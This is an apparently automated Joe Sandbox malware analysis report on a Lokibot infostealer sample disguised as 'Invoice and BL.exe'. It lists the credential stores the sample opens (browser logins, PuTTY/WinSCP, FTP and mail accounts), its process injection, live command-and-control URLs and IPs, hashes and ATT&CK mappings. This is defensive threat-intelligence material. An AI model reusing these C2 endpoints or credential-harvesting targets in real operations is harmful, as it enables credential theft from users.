            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00406069 GetUserNameW,
            Source: C:\Users\user\Desktop\Invoice and BL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected LokibotShow sources
            Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Invoice and BL.exe PID: 1152, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5412, type: MEMORYSTR
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
            Tries to steal Mail credentials (via file registry)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: PopPassword
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: SmtpPassword
            Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management InstrumentationPath InterceptionAccess Token Manipulation1Masquerading1OS Credential Dumping2Security Software Discovery121Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection211Disable or Modify Tools1Credentials in Registry2Process Discovery1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol212SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection211LSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information3DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing11Proc FilesystemSystem Information Discovery13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Invoice and BL.exe59%VirustotalBrowse
            Invoice and BL.exe34%MetadefenderBrowse
            Invoice and BL.exe61%ReversingLabsByteCode-MSIL.Infostealer.PrimaryPass
            Invoice and BL.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            7.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            0.2.Invoice and BL.exe.397e408.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            abixmaly.duckdns.org10%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://alphastand.top/alien/fre.php0%URL Reputationsafe
            http://www.ibsensoftware.com/0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://alphastand.win/alien/fre.php0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://alphastand.trade/alien/fre.php0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://abixmaly.duckdns.org/binge/fre.php13%VirustotalBrowse
            http://abixmaly.duckdns.org/binge/fre.php0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://abixmaly.duckdns.org/binge/fre.phpNg0%Avira URL Cloudsafe
            http://www.sakkal.com0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            abixmaly.duckdns.org
            		192.169.69.26
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://kbfvzoboss.bid/alien/fre.phptrue
            • URL Reputation: safe
            		unknown
            http://alphastand.top/alien/fre.phptrue
            • URL Reputation: safe
            		unknown
            http://alphastand.win/alien/fre.phptrue
            • URL Reputation: safe
            		unknown
            http://alphastand.trade/alien/fre.phptrue
            • URL Reputation: safe
            		unknown
            http://abixmaly.duckdns.org/binge/fre.phptrue
            • 13%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.apache.org/licenses/LICENSE-2.0Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
              		high
              http://www.fontbureau.comInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                		high
                http://www.fontbureau.com/designersGInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.com/designers/?Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                    		high
                    http://www.founder.com.cn/cn/bTheInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers?Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                      		high
                      http://www.ibsensoftware.com/RegSvcs.exe, RegSvcs.exe, 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.tiro.comInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designersInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                        		high
                        http://www.goodfont.co.krInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.carterandcone.comlInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.sajatypeworks.comInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.typography.netDInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers/cabarga.htmlNInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/cTheInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.galapagosdesign.com/staff/dennis.htmInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://fontfabrik.comInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.founder.com.cn/cnInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers/frere-jones.htmlInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                            		high
                            http://www.jiyu-kobo.co.jp/Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/DPleaseInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers8Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                              		high
                              http://www.fonts.comInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                                		high
                                http://www.sandoll.co.krInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.urwpp.deDPleaseInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.zhongyicts.com.cnInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://abixmaly.duckdns.org/binge/fre.phpNgRegSvcs.exe, 00000007.00000002.294755116.0000000000F48000.00000004.00000020.sdmptrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sakkal.comInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                192.169.69.26
                                		abixmaly.duckdns.orgUnited States
                                		23033WOWUStrue

                                General Information

                                Joe Sandbox Version:33.0.0 White Diamond
                                Analysis ID:458970
                                Start date:03.08.2021
                                Start time:23:24:19
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 6m 43s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:Invoice and BL.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:22
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@3/3@3/1
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 97.1% (good quality ratio 93%)
                                • Quality average: 76.7%
                                • Quality standard deviation: 28.9%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                • Excluded IPs from analysis (whitelisted): 168.61.161.212, 40.88.32.150, 52.147.198.201, 20.82.210.154, 23.211.4.86, 40.112.88.60, 13.107.4.50, 51.103.5.159, 80.67.82.235, 80.67.82.211, 20.49.157.6
                                • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, Edge-Prod-FRAr4a.env.au.au-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, afdap.au.au-msedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, au.au-msedge.net, blobcollector.events.data.trafficmanager.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, au.c-0001.c-msedge.net
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                23:25:50API Interceptor1x Sleep call for process: RegSvcs.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                192.169.69.26Samples and listed Products.exeGet hashmaliciousBrowse
                                • abixmaly.duckdns.org/binge/fre.php
                                Bank Payment Transfer for PI. BT-GJ21001 (our PO. 2100002(R).exeGet hashmaliciousBrowse
                                • abixmaly.duckdns.org/binge/fre.php
                                MglhrJiLUL.exeGet hashmaliciousBrowse
                                • 195.245.112.115/index.php
                                On35KJkYT4.exeGet hashmaliciousBrowse
                                • 195.245.112.115/index.php
                                Order_List.xlsxGet hashmaliciousBrowse
                                • dubaisupport.duckdns.org/file.exe

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                abixmaly.duckdns.orgSamples and listed Products.exeGet hashmaliciousBrowse
                                • 192.169.69.26
                                Bank Payment Transfer for PI. BT-GJ21001 (our PO. 2100002(R).exeGet hashmaliciousBrowse
                                • 192.169.69.26
                                remittance for USD 8,752.16.exeGet hashmaliciousBrowse
                                • 35.246.120.60
                                invoice for your ref.exeGet hashmaliciousBrowse
                                • 35.246.120.60
                                PTI invoice of oc 4f -36..exeGet hashmaliciousBrowse
                                • 35.246.120.60
                                contract YF8536851-1.exeGet hashmaliciousBrowse
                                • 35.246.120.60
                                GPxOawyspo.exeGet hashmaliciousBrowse
                                • 35.246.120.60
                                bank transfer SWIFT.exeGet hashmaliciousBrowse
                                • 35.246.120.60

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                WOWUSSamples and listed Products.exeGet hashmaliciousBrowse
                                • 192.169.69.26
                                Bank Payment Transfer for PI. BT-GJ21001 (our PO. 2100002(R).exeGet hashmaliciousBrowse
                                • 192.169.69.26
                                PO20171118-COGRAL SPA.jarGet hashmaliciousBrowse
                                • 192.169.69.25
                                New Order_R4.jarGet hashmaliciousBrowse
                                • 192.169.69.25
                                8MglQ6WLl5.exeGet hashmaliciousBrowse
                                • 45.14.115.62
                                QPqcGLFnyI.exeGet hashmaliciousBrowse
                                • 192.169.69.30
                                Payment Slip.xlsbGet hashmaliciousBrowse
                                • 192.169.69.25
                                AFE7D487324952929F8F037BDFBD7249049086FC8C4A9.exeGet hashmaliciousBrowse
                                • 192.169.69.25
                                10FCF8DA6000E34F9E8B8B173B6F8A65B6128E2422DB5.exeGet hashmaliciousBrowse
                                • 192.169.69.25
                                IMG_Giris emri 20201122164730_PDF.exeGet hashmaliciousBrowse
                                • 192.169.69.25
                                ORDER-21611docx.exeGet hashmaliciousBrowse
                                • 192.169.69.25
                                4714D68DBB9F9AC36425F2EC73ED434CF57407F36063C.exeGet hashmaliciousBrowse
                                • 192.169.69.25
                                ORDER-6010.pdf.exeGet hashmaliciousBrowse
                                • 192.169.69.25
                                9CCC5F07D0BF7152841C893C892DF407C854D5FF45C1A.exeGet hashmaliciousBrowse
                                • 192.169.69.26
                                0F4F0709D120ABA22D4687BFABFA5004DD54B0FCC6EF1.exeGet hashmaliciousBrowse
                                • 192.169.69.25
                                WNr7kU4wSU.exeGet hashmaliciousBrowse
                                • 192.169.69.26
                                2ga2LylVIM.exeGet hashmaliciousBrowse
                                • 192.169.69.25
                                AFa8kUgrni.exeGet hashmaliciousBrowse
                                • 192.169.69.25
                                u8SFl9j1I8.exeGet hashmaliciousBrowse
                                • 45.14.115.62
                                66D9612BA9CDE67EDEA09F3482459F3BFE03FAAA13EAD.exeGet hashmaliciousBrowse
                                • 192.169.69.25

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice and BL.exe.log
                                Process:C:\Users\user\Desktop\Invoice and BL.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.355304211458859
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview: 1
                                C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):414
                                Entropy (8bit):0.6553179628425584
                                Encrypted:false
                                SSDEEP:3:/lbOllbOllbOllbOllbON:O
                                MD5:5D9D7B3222A4B52C61F455AFA027CAE4
                                SHA1:36BF394ABFBAF545FD187CE75BC76750CB0E3A08
                                SHA-256:7B86820B53F41B8F9DD41C3F6F564796DA458F672AEB7EBA03C422252846B551
                                SHA-512:27E36988F84BDFEE83F99FE2FCF1D98C3F6E4C3BFBC74958475B13243561016976D4F1998972B41C9D23CF5EE8307D84F0FE61711C140BD3D0E38E44A7403BFE
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.064655736923516
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Windows Screen Saver (13104/52) 0.07%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                File name:Invoice and BL.exe
                                File size:530432
                                MD5:3c7b342067f6142e6ed45551f5f60c50
                                SHA1:d83513aa4ac743b7fe0f7d1052a37b5ef1b50f60
                                SHA256:419865b95d9a00faea2d00122baabd7c2ea0be23dd5d3f15eae589bb5a6beecd
                                SHA512:33dcb9c1c0a5b7445c65baf93c2e84d2824a638e6a332b7f52c7a4b7b470e19bb75d28a47f43887ef85a1a593137e5e3805882e26607a4c00d9889760371aa8c
                                SSDEEP:6144:szFdMVnEVM6k02GhNvpG+5FPx2eW1REnHhJZdSFAx7cLM7QBUWQMZFGV1R5:KFdM5X02iNv4sjWTGmY7/DMZFUR5
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..............-... ...@....@.. ....................................@................................

                                File Icon

                                Icon Hash:00828e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0x482d82
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x6100F2E2 [Wed Jul 28 06:02:10 2021 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:v4.0.30319
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
